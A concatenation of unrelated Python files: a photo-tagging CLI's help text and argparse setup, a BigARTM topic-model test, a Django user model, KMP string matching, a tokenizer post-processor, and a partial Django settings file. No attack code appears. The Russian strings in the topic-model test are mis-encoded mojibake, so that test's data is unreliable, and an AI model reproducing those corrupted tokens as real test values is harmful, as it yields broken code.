Add a tag to photos by a filename glob or by search results.
> etiquette_cli.py add_tag tag_name glob_patterns
> etiquette_cli.py add_tag tag_name --search searchargs
Examples:
> etiquette_cli.py add_tag wallpaper wall*.jpg wall*.png
> etiquette_cli.py add_tag author.author_voussoir --search --tag-forbids author
See etiquette_cli.py search --help for more info about searchargs.
''',
remove_tag='''
remove_tag:
Remove a tag from photos by a filename glob or by search results.
> etiquette_cli.py remove_tag tag_name glob_patterns
> etiquette_cli.py remove_tag tag_name --search searchargs
Examples:
> etiquette_cli.py remove_tag watchlist spongebob*.mp4
> etiquette_cli.py remove_tag watchlist --search --tag-musts directed_by_michael_bay
See etiquette_cli.py search --help for more info about searchargs.
''',
delete='''
delete:
Remove photos or albums from the database.
flags:
--delete_file:
Delete the file from disk after committing.
Your config.json file's recycle_instead_of_delete will influence this.
Without this flag, photos are removed from the db but remain on disk.
> etiquette_cli.py delete --photos id id id
> etiquette_cli.py delete --search searchargs
> etiquette_cli.py delete --albums id id id
> etiquette_cli.py delete --album-search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
digest='''
digest:
Digest a directory, adding new files as Photos into the database.
> etiquette_cli.py digest directory <flags>
flags:
--exclude_directories A B C:
Any directories matching any pattern of A, B, C... will be skipped.
These patterns may be absolute paths like 'D:\\temp', plain names like
'thumbnails' or glob patterns like 'build_*'.
--exclude_filenames A B C:
Any filenames matching any pattern of A, B, C... will be skipped.
These patterns may be absolute paths like 'D:\\somewhere\\config.json',
plain names like 'thumbs.db' or glob patterns like '*.temp'.
--glob_directories A B C:
Only directories matching any pattern of A, B, C... will be digested.
These patterns may be plain names or glob patterns like '2021*'
--glob_filenames A B C:
Only filenames matching any pattern of A, B, C... will be digested.
These patterns may be plain names or glob patterns like '*.jpg'
--no_albums:
Do not create any albums. By default, albums are created and nested to
match the directory structure.
--ratelimit X:
Limit the ingest of new Photos to only one per X seconds. This can be
used to reduce system load or to make sure that two photos don't get the
same `created` timestamp.
--no_recurse:
Do not recurse into subdirectories. Only create Photos from files in
the current directory.
Examples:
> etiquette_cli.py digest media --ratelimit 1
> etiquette_cli.py digest photos --no-recurse --no-albums --ratelimit 0.25
> etiquette_cli.py digest . --glob-filenames *.jpg --exclude-filenames thumb*
''',
easybake='''
easybake:
Create and manipulate tags by easybake strings.
> etiquette_cli.py easybake eb_string
''',
export_symlinks='''
export_symlinks:
Search for photos or albums, then create symlinks pointing to the results.
THIS IS STILL A BIT EXPERIMENTAL.
This can be used to gather up search results for the purpose of further
uploading, transfering, etc. with other applications.
Symlinks point to files (if result is a photo) or directories (if result is
an album with an associated directory).
Albums are limited to only one associated directory since the output
symlink can't point to two places at once.
> etiquette_cli.py export_symlinks --destination directory --search searchargs
> etiquette_cli.py export_symlinks --destination directory --album-search searchargs
flags:
--destination X:
A path to a directory into which the symlinks will be placed.
--dry:
Print the results without actually creating the symlinks.
--prune:
In the destination directory, any existing symlinks whose target no
longer exists will be deleted.
See etiquette_cli.py search --help for more info about searchargs.
''',
generate_thumbnail='''
generate_thumbnail:
Generate thumbnails for photos.
With no args, all files under the cwd will be thumbnailed.
Or, you can pass specific photo ids or searchargs.
> etiquette_cli.py generate_thumbnail
> etiquette_cli.py generate_thumbnail --photos id id id
> etiquette_cli.py generate_thumbnail --search searchargs
Examples:
> etiquette_cli.py generate_thumbnail --search --has-thumbnail no
See etiquette_cli.py search --help for more info about searchargs.
''',
init='''
init:
Create a new Etiquette database in the current directory.
> etiquette_cli.py init
''',
purge_deleted_files='''
purge_deleted_files:
Delete any Photo objects whose file no longer exists on disk.
> etiquette_cli.py purge_deleted_files
> etiquette_cli.py purge_deleted_files --photos id id id
> etiquette_cli.py purge_deleted_files --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
purge_empty_albums='''
purge_empty_albums:
Delete any albums which have no child albums or photos.
Consider running purge_deleted_files first, so that albums containing
deleted files will get cleared out and then caught by this function.
With no args, all albums will be checked.
Or you can pass specific album ids. (searchargs is not available since
albums only appear in search results when a matching photo is found, and
we're looking for albums with no photos!)
> etiquette_cli.py purge_empty_albums
> etiquette_cli.py purge_empty_albums --albums id id id
''',
reload_metadata='''
reload_metadata:
Reload photos' metadata by reading the files from disk.
With no args, all files under the cwd will be reloaded.
Or, you can pass specific photo ids or searchargs.
> etiquette_cli.py reload_metadata
> etiquette_cli.py reload_metadata --photos id id id
> etiquette_cli.py reload_metadata --search searchargs
flags:
--force:
By default, we wil skip any files that have the same mtime and byte
size as before. You can pass --force to always reload.
--hash_bytes_per_second X:
A string like "10mb" to limit the speed of file hashing for the purpose
of reducing system load.
See etiquette_cli.py search --help for more info about searchargs.
''',
relocate='''
relocate:
Change a photo's filepath. Used for updating photos that have been changed
by external tools.
> etiquette_cli.py relocate photo_id filepath
''',
search='''
search:
Search for photos and albums with complex operators.
> etiquette_cli.py search searchargs
> etiquette_cli.py search --album-search searchargs
Searchargs:
--area X-Y:
Photo/video width*height between X and Y.
--width X-Y:
Photo/video width between X and Y.
--height X-Y:
Photo/video height between X and Y.
--ratio X-Y:
Photo/video aspect ratio between X and Y.
--bytes X-Y:
File size in bytes between X and Y.
--duration X-Y:
Media duration between X and Y seconds.
--author X:
Photo authored by user with username X.
--created X-Y:
Photo creation date between X and Y unix timestamp.
--extension A,B,C:
Photo with any extension of A, B, C...
--extension_not A,B,C:
Photo without any extension of A, B, C...
--filename X:
Search terms for Photo's filename.
--has_tags yes/no/null:
If yes, Photo must have at least one tag.
If no, Photo must have no tags.
If null, doesn't matter.
--has_thumbnail yes/no/null:
--is_searchhidden yes/no/null:
--mimetype A,B,C:
Photo with any mimetype of A, B, C...
--sha256 A,B,C:
Photo with any sha256 of A, B, C...
--tag_musts A,B,C:
Photo must have all tags A and B and C...
--tag_mays A,B,C:
Photo must have at least one tag of A, B, C...
--tag_forbids A,B,C:
Photo must not have any tags of A, B, C...
--tag_expression X:
Complex expression string to match tags.
--limit X:
Limit results to first X items.
--offset X:
Skip the first X items.
--orderby X-Y:
Order the results by property X in direction Y. E.g. created-desc or
bytes-asc.
''',
show_associated_directories='''
show_associated_directories:
Show the associated directories for albums.
> etiquette_cli.py show_associated_directories
> etiquette_cli.py show_associated_directories --albums id id id
> etiquette_cli.py show_associated_directories --album-search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
set_searchhidden='''
set_searchhidden:
Mark photos as searchhidden.
> etiquette_cli.py set_searchhidden --photos id id id
> etiquette_cli.py set_searchhidden --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
unset_searchhidden='''
unset_searchhidden:
Unmark photos as searchhidden.
> etiquette_cli.py unset_searchhidden --photos id id id
> etiquette_cli.py unset_searchhidden --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
tag_breplace='''
tag_breplace:
For all tags in the database, use find-and-replace to rename the tags.
> etiquette_cli.py tag_breplace replace_from replace_to
''',
tag_list='''
tag_list:
Show all tags in the database.
> etiquette_cli.py tag_list
''',
)
DOCSTRING = betterhelp.add_previews(DOCSTRING, SUB_DOCSTRINGS)
@vlogging.main_decorator
def main(argv):
parser = argparse.ArgumentParser(description=__doc__)
subparsers = parser.add_subparsers()
primary_args = []
photo_id_args = []
photo_search_args = []
album_id_args = []
album_search_args = []
mode = primary_args
for arg in argv:
if 0:
pass
elif arg in {'--search', '--photo_search', '--photo-search'}:
mode = photo_search_args
elif arg in {'--album_search', '--album-search'}:
mode = album_search_args
elif arg == '--photos':
mode = photo_id_args
elif arg == '--albums':
mode = album_id_args
else:
mode.append(arg)
p_add_tag = subparsers.add_parser('add_tag', aliases=['add-tag'])
p_add_tag.add_argument('tag_name')
p_add_tag.add_argument('globs', nargs='*')
p_add_tag.add_argument('--yes', dest='autoyes', action='store_true')
p_add_tag.set_defaults(func=lambda args: add_remove_tag_argparse(args, action='add'))
p_remove_tag = subparsers.add_parser('remove_tag', aliases=['remove-tag'])
p_remove_tag.add_argument('tag_name')
p_remove_tag.add_argument('globs', nargs='*')
p_remove_tag.add_argument('--yes', dest='autoyes', action='store_true')
p_remove_tag.set_defaults(func=lambda args: add_remove_tag_argparse(args, action='remove'))
p_delete = subparsers.add_parser('delete')
p_delete.add_argument('--delete_file', '--delete-file', action='store_true')
p_delete.add_argument('--yes', dest='autoyes', action='store_true')
p_delete.set_defaults(func=delete_argparse)
p_digest = subparsers.add_parser('digest', aliases=['digest_directory', 'digest-directory'])
p_digest.add_argument('directory')
p_digest.add_argument('--exclude_directories', '--exclude-directories', nargs='+', default=None)
p_digest.add_argument('--exclude_filenames', '--exclude-filenames', nargs='+', default=None)
p_digest.add_argument('--glob_directories', '--glob-directories', nargs='+', default=None)
p_digest.add_argument('--glob_filenames', '--glob-filenames', nargs='+', default=None)
p_digest.add_argument('--no_albums', '--no-albums', dest='make_albums', action='store_false', default=True)
p_digest.add_argument('--ratelimit', dest='ratelimit', type=float, default=0.2)
p_digest.add_argument('--no_recurse', '--no-recurse', dest='recurse', action='store_false', default=True)
p_digest.add_argument('--hash_bytes_per_second', '--hash-bytes-per-second', default=None)
p_digest.add_argument('--yes', dest='autoyes', action='store_true')
p_digest.set_defaults(func=digest_directory_argparse)
p_easybake = subparsers.add_parser('easybake')
p_easybake.add_argument('eb_strings', nargs='+')
p_easybake.add_argument('--yes', dest='autoyes', action='store_true')
p_easybake.set_defaults(func=easybake_argparse)
p_export_symlinks = subparsers.add_parser('export_symlinks', aliases=['export-symlinks'])
p_export_symlinks.add_argument('--destination', dest='destination', required=True)
p_export_symlinks.add_argument('--dry', dest='dry_run', action='store_true')
p_export_symlinks.add_argument('--prune', dest='prune', action='store_true')
p_export_symlinks.set_defaults(func=export_symlinks_argparse)
p_generate_thumbnail = subparsers.add_parser('generate_thumbnail', aliases=['generate-thumbnail'])
p_generate_thumbnail.add_argument('--yes', dest='autoyes', action='store_true')
p_generate_thumbnail.set_defaults(func=generate_thumbnail_argparse)
p_init = subparsers.add_parser('init', aliases=['create'])
p_init.set_defaults(func=init_argparse)
p_purge_deleted_files = subparsers.add_parser('purge_deleted_files', aliases=['purge-deleted-files'])
p_purge_deleted_files.add_argument('--yes', dest='autoyes', action='store_true')
p_purge_deleted_files.set_defaults(func=purge_deleted_files_argparse)
p_purge_empty_albums = subparsers.add_parser('purge_empty_albums', aliases=['purge-empty-albums'])
p_purge_empty_albums.add_argument('--yes', dest='autoyes', action='store_true')
p_purge_empty_albums.set_defaults(func=purge_empty_albums_argparse)
p_reload_metadata = subparsers.add_parser('reload_metadata', aliases=['reload-metadata'])
p_reload_metadata.add_argument('--hash_bytes_per_second', '--hash-bytes-per-second', default=None)
p_reload_metadata.add_argument('--force', action='store_true')
p_reload_metadata.add_argument('--yes', dest='autoyes', action='store_true')
p_reload_metadata.set_defaults(func=reload_metadata_argparse)
p_relocate = subparsers.add_parser('relocate')
p_relocate.add_argument('photo_id')
p_relocate.add_argument('filepath')
p_relocate.add_argument('--yes', dest='autoyes', action='store_true')
p_relocate.set_defaults(func=relocate_argparse)
p_search = subparsers.add_parser('search')
p_search.add_argument('--area', dest='area', default=None)
p_search.add_argument('--width', dest='width', default=None)
p_search.add_argument('--height', dest='height', default=None)
p_search.add_argument('--ratio', dest='ratio', default=None)
p_search.add_argument('--bytes', dest='bytes', default=None)
p_search.add_argument('--duration', dest='duration', default=None)
p_search.add_argument('--author', dest='author', default=None)
p_search.add_argument('--created', dest='created', default=None)
p_search.add_argument('--extension', dest='extension', default=None)
p_search.add_argument('--extension_not', '--extension-not', dest='extension_not', default=None)
p_search.add_argument('--filename', dest='filename', default=None)
p_search.add_argument('--has_tags', '--has-tags', dest='has_tags', default=None)
p_search.add_argument('--has_thumbnail', '--has-thumbnail', dest='has_thumbnail', default=None)
p_search.add_argument('--is_searchhidden', '--is-searchhidden', dest='is_searchhidden', default=False)
p_search.add_argument('--sha256', default=None)
p_search.add_argument('--mimetype', dest='mimetype', default=None)
p_search.add_argument('--tag_musts', '--tag-musts', dest='tag_musts', default=None)
p_search.add_argument('--tag_mays', '--tag-mays', dest='tag_mays', default=None)
p_search.add_argument('--tag_forbids', '--tag-forbids', dest='tag_forbids', default=None)
p_search.add_argument('--tag_expression', '--tag-expression', dest='tag_expression', default=None)
p_search.add_argument('--limit', dest='limit', default=None)
p_search.add_argument('--offset', dest='offset', default=None)
p_search.add_argument('--orderby', dest='orderby', default='basename-ASC')
# p_search.add_argument('--yield_albums', '--yield-albums', dest='yield_albums', default=None)
p_search.set_defaults(func=search_argparse)
p_show_associated_directories = subparsers.add_parser('show_associated_directories', aliases=['show-associated-directories'])
p_show_associated_directories.set_defaults(func=show_associated_directories_argparse)
p_set_searchhidden = subparsers.add_parser('set_searchhidden', aliases=['set-searchhidden'])
p_set_searchhidden.add_argument('--yes', dest='autoyes', action='store_true')
p_set_searchhidden.set_defaults(func=lambda args: set_unset_searchhidden_argparse(args, searchhidden=True))
p_unset_searchhidden = subparsers.add_parser('unset_searchhidden', aliases=['unset-searchhidden'])
p_unset_searchhidden.add_argument('--yes', dest='autoyes', action='store_true')
p_unset_searchhidden.set_defaults(func=lambda args: set_unset_searchhidden_argparse(args, searchhidden=False))
p_tag_breplace = subparsers.add_parser('tag_breplace', aliases=['tag-breplace'])
p_tag_breplace.add_argument('replace_from')
p_tag_breplace.add_argument('replace_to')
p_tag_breplace.add_argument('--set_synonym', '--set-synonym', dest='set_synonym', action='store_true')
p_tag_breplace.add_argument('--regex', dest='regex', action='store_true')
p_tag_breplace.add_argument('--yes', dest='autoyes', action='store_true')
p_tag_breplace.set_defaults(func=tag_breplace_argparse)
p_tag_list = subparsers.add_parser('tag_list', aliases=['tag-list'])
p_tag_list.set_defaults(func=tag_list_argparse)
##
def postprocessor(args):
args.photo_search_args = p_search.parse_args(photo_search_args) if photo_search_args else None
args.album_search_args = p_search.parse_args(album_search_args) if album_search_args else None
args.photo_id_args = [id for arg in photo_id_args for id in stringtools.comma_space_split(arg)]
args.album_id_args = [id for arg in album_id_args for id in stringtools.comma_space_split(arg)]
args.any_id_args = bool(
args.photo_search_args or
args.album_search_args or
args.photo_id_args or
args.album_id_args
)
return args
try:
return betterhelp.subparser_main(
primary_args,
parser,
main_docstring=DOCSTRING,
sub_docstrings=SUB_DOCSTRINGS,
args_postprocessor=postprocessor,
)
except etiquette.exceptions.NoClosestPhotoDB as exc:
pipeable.stderr(exc.error_message)
pipeable.stderr('Try `etiquette_cli.py init` to create the database.')
return 1
if __name__ == '__main__':
raise SystemExit(main(sys.argv[1:]))
|
# -*- coding: utf-8 -*-
# Copyright 2017, Additive Regularization of Topic Models.
from __future__ import print_function
import os
import uuid
import string
import itertools
import tempfile
import shutil
import pytest
from six.moves import range, zip
import artm.wrapper
import artm.wrapper.messages_pb2 as messages
import artm.master_component as mc
def _print_top_tokens(top_tokens_score, expected_values_topic, tolerance):
top_tokens_triplets = zip(top_tokens_score.topic_index,
zip(top_tokens_score.token,
top_tokens_score.weight))
for topic_index, group in itertools.groupby(top_tokens_triplets, key=lambda triplet: triplet[0]):
print_string = u'Topic#{0} : '.format(topic_index)
for _, (token, weight) in group:
print_string += u' {0}({1:.3f})'.format(token, weight)
assert abs(expected_values_topic[topic_index][token] - weight) < tolerance
print(print_string)
def test_func():
# Set some constants
dictionary_name = 'dictionary'
pwt = 'pwt'
nwt = 'nwt'
num_topics = 2
num_document_passes = 10
num_outer_iterations = 10
russian_class_weight = 1.0
english_class_weight = 1.0
russian_class = '@russian'
english_class = '@english'
tolerance = 0.001
expected_values_rus_topic = {
0: {
u'Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ': 0.125,
u'ΡΠ΅ΠΊΡΡ': 0.125,
u'Π°Π½Π°Π»ΠΈΠ·': 0.125,
u'ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ': 0.125,
u'ΠΌΠΎΠ΄Π΅Π»Ρ': 0.125,
u'ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ': 0.083,
u'ΡΠ΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ': 0.083,
'model': 0.042,
'topic': 0.042,
'artm': 0.042
},
1: {
u'Π½ΠΎΠ³ΠΈΠ΅': 0.115,
u'ΠΎΡΡΡΠ΄': 0.115,
u'ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅': 0.115,
u'ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ': 0.115,
u'Ρ
ΠΈΡΠ½ΡΠΉ': 0.077,
u'Π»Π°ΡΡΠΎ': 0.077,
u'ΠΌΠΎΡΠΆΠΎΠ²ΡΡ
': 0.077,
u'ΡΡΠ»Π΅Π½Ρ': 0.077,
u'ΡΡΠ°ΡΡΡΠΉ': 0.077,
u'ΠΊΠΎΡΠΎΡΠΊΠΎ': 0.038
}
}
expected_values_eng_topic = {
0: {
'model': 0.167,
'text': 0.125,
'analysis': 0.125,
'statistical': 0.125,
'topic': 0.125,
'artm': 0.083,
'plsa': 0.083,
'lda': 0.083,
'collection': 0.083,
'not': 0.000
},
1: {
'mammal': 0.188,
'predatory': 0.125,
'eared': 0.125,
'marine': 0.125,
'seal': 0.125,
'not': 0.062,
'reptile': 0.062,
'crocodilia': 0.062,
'order': 0.062,
'pinnipeds': 0.062
}
}
expected_sparsity_values = {'russian': 0.5, 'english': 0.5}
# Prepare multimodal data
ens = []
rus = []
ens.append(u'Topic model statistical analysis text collection LDA PLSA ARTM')
rus.append(u'Π’Π΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ ΠΌΠΎΠ΄Π΅Π»Ρ ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· ΡΠ΅ΠΊΡΡ ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ')
ens.append(u'LDA statistical topic model text collection')
rus.append(u'LDA ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ ΡΠ΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ ΠΌΠΎΠ΄Π΅Π»Ρ ΡΠ΅ΠΊΡΡ Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ')
ens.append(u'PLSA statistical analysis text model')
rus.append(u'PLSA ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ ΡΠ΅ΠΊΡΡ ΠΌΠΎΠ΄Π΅Π»Ρ')
ens.append(u'ARTM analysis topic model')
rus.append(u'ARTM Π°Π½Π°Π»ΠΈΠ· Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ topic model')
ens.append(u'Pinnipeds seal marine mammal order')
rus.append(u'Π’ΡΠ»Π΅Π½Ρ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΌΠΎΡΠΆΠΎΠ²ΡΡ
ΠΎΡΡΡΠ΄ Π»Π°ΡΡΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ens.append(u'Eared seal marine predatory mammal')
rus.append(u'Π£ΡΠ°ΡΡΡΠΉ ΡΡΠ»Π΅Π½Ρ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΎΡΡΡΠ΄ Ρ
ΠΈΡΠ½ΡΠΉ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠΎΡΠΆΠΎΠ²ΡΡ
Π»Π°ΡΡΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ens.append(u'Eared Crocodilia predatory reptile not mammal')
rus.append(u'Π£ΡΠ°ΡΡΡΠΉ ΠΊΡΠΎΠΊΠΎΠ΄ΠΈΠ» Π³Π΅Π½Π° ΠΎΡΡΡΠ΄ Ρ
ΠΈΡΠ½ΡΠΉ Π½Π΅ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΊΠΎΡΠΎΡΠΊΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ru_dic = {} # mapping from russian token to its index in batch.token list
en_dic = {} # mapping from english token to its index in batch.token list
batch = messages.Batch() # batch representing the entire collection
batch.id = str(uuid.uuid1())
dict_data = messages.DictionaryData() # BigARTM dictionary to initialize model
dict_data.name = dictionary_name
def append(tokens, dic, item, class_id):
for token in tokens:
if token not in dic: # New token discovered:
dic[token] = len(batch.token) # 1. update ru_dic or en_dic
batch.token.append(token) # 2. update batch.token and batch.class_id
batch.class_id.append(class_id)
dict_data.token.append(token)
dict_data.class_id.append(class_id)
# Add token to the item.
item.token_id.append(dic[token])
# replace '1' with the actual number of token occupancies in the item
item.token_weight.append(1)
# Iterate through all items and populate the batch
for (en, ru) in zip(ens, rus):
next_item = batch.item.add()
next_item.id = len(batch.item) - 1
append(ru.lower().split(), ru_dic, next_item, russian_class)
append(en.lower().split(), en_dic, next_item, english_class)
batches_folder = tempfile.mkdtemp()
try:
# Create the instance of low-level API and master object
lib = artm.wrapper.LibArtm()
# Save batch and dictionary on the disk
lib.ArtmSaveBatch(batches_folder, batch)
# Create master component and scores
scores = {'SparsityPhiRus': messages.SparsityPhiScoreConfig(class_id=russian_class),
'SparsityPhiEng': messages.SparsityPhiScoreConfig(class_id=english_class),
'TopTokensRus': messages.TopTokensScoreConfig(class_id=russian_class),
'TopTokensEng': messages.TopTokensScoreConfig(class_id=english_class)}
master = mc.MasterComponent(lib, scores=scores)
# Create the collection dictionary
lib.ArtmCreateDictionary(master.master_id, dict_data)
# Initialize model
master.initialize_model(model_name=pwt,
topic_names=['topic_{}'.format(i) for i in range(num_topics)],
dictionary_name=dictionary_name)
for iter in range(num_outer_iterations):
# Invoke one scan of the collection, regularize and normalize Phi
master.clear_score_cache()
master.process_batches(pwt, nwt, num_document_passes, batches_folder,
class_ids=[russian_class, english_class],
class_weights=[russian_class_weight, english_class_weight])
master.normalize_model(pwt, nwt)
# Retrieve and print scores
top_tokens_rus = master.get_score('TopTokensRus')
top_tokens_eng = master.get_score('TopTokensEng')
sp_phi_rus = master.get_score('SparsityPhiRus')
sp_phi_eng = master.get_score('SparsityPhiEng')
print('Top tokens per russian topic:')
_print_top_tokens(top_tokens_rus, expected_values_rus_topic, tolerance)
print('Top tokens per english topic:')
_print_top_tokens(top_tokens_eng, expected_values_eng_topic, tolerance)
print('\nSparsity Phi: russian {0:.3f}, english {1:.3f}'.format(sp_phi_rus.value, sp_phi_eng.value))
assert abs(expected_sparsity_values['russian'] - sp_phi_rus.value) < tolerance
assert abs(expected_sparsity_values['english'] - sp_phi_eng.value) < tolerance
finally:
shutil.rmtree(batches_folder)
|
from django.db import models
from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
pass
# add additional fields in here
def __str__(self):
return self.username
|
# while j < n and i < m:
# if i == -1 or t[j] == p[i]:
# j, i = j+1, i+1
# else:
# i = pnext[i]
def matching_KMP(t, p, pnext):
j, i = 0, 0
n, m = len(t), len(p)
while j < n and i < m:
if i == -1 or t[j] == p[i]:
j, i = j+1, i+1
else:
i = pnext[i]
if i == m:
return j-i
return -1
def gen_pnext(p):
i, k, m = 0, -1, len(p)
pnext = [-1] * m
while i < m-1:
if k == -1 or p[i] == p[k]:
i, k = i+1, k+1
pnext[i] = k
else:
k = pnext[k]
return pnext
#ζΉθΏη
def genPnext(p):
i, k, m = 0 , -1, len(p)
pnext = [-1]*m
while i < m-1:
if k == -1 or p[i] == p[k]:
i, k = i+1, k+1
if p[i] == p[k]:
pnext[i] = pnext[k]
else:
pnext[i] = k
else:
k = pnext[k]
return pnext
|
def postprocess_decoded_seq(answers):
"""
Corrects for some extra spaces that are created by the decode method
of the tokenizer like in numerical strings
example: 1, 000, 000 --> 1,000,000
Args:
answers: list[str]
Returns:
new_answers: list[str]
"""
new_answers = []
for answer in answers:
parts = answer.split(", ")
if len(parts) > 1:
try:
new0 = parts[0]
for i in range(1, len(parts)):
if new0[-1].isnumeric() and parts[i][0].isnumeric():
if len(parts[i]) > 3 and parts[i][3].isnumeric():
new0 = ", ".join([new0, parts[i]])
else:
new0 = ",".join([new0, parts[i]])
else:
new0 = ", ".join([new0, parts[i]])
except IndexError:
print("--> IndexError:", answer)
new0 = answer
else:
new0 = answer
parts = new0.split(". ")
if len(parts) > 1:
new1 = parts[0]
for i in range(1, len(parts)):
try:
if new1[-1].isnumeric() and parts[i][0].isnumeric():
new1 = ".".join([new1, parts[i]])
else:
new1 = ". ".join([new1, parts[i]])
except IndexError:
new1 = parts[1]
else:
new1 = new0
parts = new1.split(" : ")
if len(parts) > 1:
new2 = parts[0]
for i in range(1, len(parts)):
if new2[-1].isnumeric() and parts[i][0].isnumeric():
new2 = ":".join([new2, parts[i]])
else:
new2 = " : ".join([new2, parts[i]])
else:
new2 = new1
new_answers.append(new2)
return new_answers
|
import os
# Import global settings to make it easier to extend settings.
from django.conf.global_settings import *
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
""" Get the environment variable or return an exception"""
try:
return os.environ[var_name]
except KeyError:
error_msg = "Set the %s environment variable" % var_name
raise ImproperlyConfigured(error_msg)
# Import the project module to calculate directories relative to the module
# location.
PROJECT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../..')
# List all Django apps here. Note that standard Python libraries should not
# be added to this list since Django will not recognize them as apps anyway.
# An app is really only an "app" if a `models` module or package is defined.
# Read more about projects vs. apps here:
# https://docs.djangoproject.com/en/1.3/intro/tutorial01/#creating-models
INSTALLED_APPS = (
'omop_harvest',
'south',
'serrano',
'avocado',
'modeltree',
'haystack',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.markup',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'chopauth',
'registration'
)
#
# ADMINISTRATIVE
#
# TODO: Add admins here.
# Admins receive any error messages by email if DEBUG is False
ADMINS = ()
# Managers receive broken link emails if SEND_BROKEN_LINK_EMAILS is True
MANAGERS = ADMINS
# List of IP addresses which will show debug comments
INTERNAL_IPS = ('127.0.0.1', '::1')
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#
# DATABASES
# Each database can be specified here, but passwords should be in a separate
# file that is not versioned. Use ``local_settings.py``.
#
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_PATH, 'harvest.db')
},
'omop': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_PATH, 'omop.db')
}
}
DATABASE_ROUTERS = ('omop_harvest.routers.OmopRouter',)
#
# LOCALITY
#
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = None
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
#
# STATIC AND MEDIA
# The application's static files should be placed in the STATIC_ROOT in
# addition to other static files found in third-party apps. The MEDIA_ROOT
# is intended for user uploaded files.
#
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_PATH, '_site/media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_PATH, '_site/static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# TODO: Remove this. Shouldn't the files at the below location
# be collected under '_site/static'?
# Additional locations of static files
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
# project level static files
STATICFILES_DIRS = (
os.path.join(PROJECT_PATH, 'omop_harvest', 'static'),
)
#
# TEMPLATES
#
# Project level templates and template directories that override
# third-party app templates.
TEMPLATE_DIRS = ()
# Context processors are simply functions that return a dict which augments the
# template context.
TEMPLATE_CONTEXT_PROCESSORS += (
'django.core.context_processors.request',
'omop_harvest.context_processors.static',
)
#
# URLS
#
# FORCE_SCRIPT_NAME overrides the interpreted 'SCRIPT_NAME' provided by the
# web server. since the URLs below are used for various purposes outside of
# the WSGI application (static and media files), these need to be updated to
# reflect this discrepancy.
FORCE_SCRIPT_NAME = ''
LOGIN_URL = FORCE_SCRIPT_NAME + '/login/'
LOGIN_REDIRECT_URL = FORCE_SCRIPT_NAME + '/query/'
LOGOUT_URL = '/logout/'
ROOT_URLCONF = 'omop_harvest.conf.urls'
# For non-publicly accessible applications, the siteauth app can be used to
# restrict access site-wide.
